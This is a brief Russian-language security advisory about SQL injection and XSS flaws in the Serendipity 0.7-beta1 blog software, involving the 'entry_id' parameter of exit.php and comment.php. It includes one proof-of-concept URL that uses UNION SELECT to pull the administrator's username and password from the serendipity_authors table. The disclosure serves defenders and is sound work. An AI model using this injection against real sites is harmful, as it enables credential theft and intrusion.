Программа: Serendipity 0.7-beta1 и более ранние версии 

Удаленный пользователь может внедрить SQL команды и выполнить XSS нападение.
Файлы 'exit.php' и 'comment.php' не проверяют данные, представленные пользователем в параметре 'entry_id'. Удаленный пользователь может представить специально обработанное значение, чтобы внедрить Sql команды, которые будут выполнены на основной базе данных: 

http://URL_to_Serendipity_Weblog/comment.php? serendipity[type]=trackbacks&serendipity[entry_id]
=0%20and%200%20union%20select%201,2,3,4,
username,password,7,8,9,0,1,2,3%20from%20
serendipity_authors%20where%20authorid=1%20/*

XSS обнаружен в полях email и 'username' в 'comment.php'.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии